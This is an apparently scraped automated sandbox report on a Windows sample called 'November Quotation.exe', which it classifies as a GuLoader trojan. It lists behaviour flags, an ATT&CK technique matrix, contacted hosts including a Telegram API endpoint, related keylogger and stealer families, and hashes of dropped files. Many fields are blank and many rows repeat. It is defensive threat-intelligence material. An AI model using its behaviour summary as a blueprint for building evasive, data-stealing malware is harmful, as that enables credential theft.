| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Code function: | 0_2_004060E4 | |
| Source: | Code function: | 0_2_0040276E | |
| Source: | Code function: | 0_2_00405629 | |
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | API call chain: | graph_0-2947 | ||
| Source: | API call chain: | graph_0-3088 | ||
| Source: | Process information queried: | Jump to behavior | ||
Anti Debugging | |
|---|
| Source: | Thread information set: | Jump to behavior | ||
| Source: | Thread information set: | Jump to behavior | ||
| Source: | Process queried: | Jump to behavior | ||
| Source: | Code function: | 2_2_076B0D30 | |
| Source: | Code function: | 0_2_0040610B | |
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Process created / APC Queued / Resumed: | Jump to behavior | ||
| Source: | Thread APC queued: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 0_2_00405DC3 | |
Lowering of HIPS / PFW / Operating System Security Settings | |
|---|
| Source: | Registry value created: | Jump to behavior | ||
| Source: | Registry value created: | Jump to behavior | ||
| Source: | Registry key created or modified: | Jump to behavior | ||
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 311 Process Injection | 11 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 3 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 61% | ReversingLabs | Win32.Trojan.GuLoader |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 61% | ReversingLabs | Win32.Trojan.GuLoader |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 172.217.19.174 | true | false | high | |
| drive.usercontent.google.com | 142.250.181.1 | true | false | high | |
| reallyfreegeoip.org | 172.67.177.134 | true | false | high | |
| s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | high | |
| api.telegram.org | 149.154.167.220 | true | false | high | |
| checkip.dyndns.com | 193.122.130.0 | true | false | high | |
| checkip.dyndns.org | unknown | unknown | false | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| false | high | ||
| false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
| 142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
| 193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
| 172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
| 172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
| Joe Sandbox version: | 41.0.0 Charoite |
| Analysis ID: | 1562309 |
| Start date and time: | 2024-11-25 13:45:38 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 7m 11s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 10 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | November Quotation.exe |
| Detection: | MAL |
| Classification: | mal100.troj.evad.winEXE@6/15@6/5 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: November Quotation.exe
| Time | Type | Description |
|---|---|---|
| 07:46:28 | API Interceptor | |
| 07:47:39 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 149.154.167.220 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | ||
| Get hash | malicious | DarkCloud | Browse | |||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | MassLogger RAT | Browse | |||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
| 193.122.130.0 | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| s-part-0035.t-0009.t-msedge.net | Get hash | malicious | DarkCloud | Browse |
| |
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Credential Flusher | Browse |
| ||
| Get hash | malicious | LummaC Stealer | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Stealc, Vidar | Browse |
| ||
| Get hash | malicious | LummaC Stealer | Browse |
| ||
| Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Credential Flusher | Browse |
| ||
| api.telegram.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | DarkCloud | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| reallyfreegeoip.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| TELEGRAMRU | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | DarkCloud | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Stealc, Vidar | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| ORACLE-BMC-31898US | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| CLOUDFLARENETUS | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Phisher | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar | Browse |
| ||
| Get hash | malicious | LummaC Stealer | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| 3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse |
| ||
| 37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Remcos, GuLoader | Browse |
| |
| Get hash | malicious | DarkCloud | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
| ||
| Get hash | malicious | Remcos, GuLoader | Browse |
|
⊘No context
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 14744 |
| Entropy (8bit): | 4.992175361088568 |
| Encrypted: | false |
| SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
| MD5: | A35685B2B980F4BD3C6FD278EA661412 |
| SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
| SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
| SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
| Malicious: | false |
| Reputation: | moderate, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Reputation: | high, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Reputation: | high, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 309198 |
| Entropy (8bit): | 7.687688364471506 |
| Encrypted: | false |
| SSDEEP: | 6144:+45Jz+d75cwaWrXVEFGv23rV8jwg2LGucOx7B0/ghRvp9EyMX4BWA:nBS7l/XVEFGv23Kwg2LGUJRB9EyMX4b |
| MD5: | E5466E123FF5ED549CDCD775BCA484F2 |
| SHA1: | 46ACAB555B1CF24512E5D5F7C2BACEA6182A5624 |
| SHA-256: | 61AA8D19A5C0C98767C0561275EA0A7336DE8255413B4098DB600BCFE6321ABF |
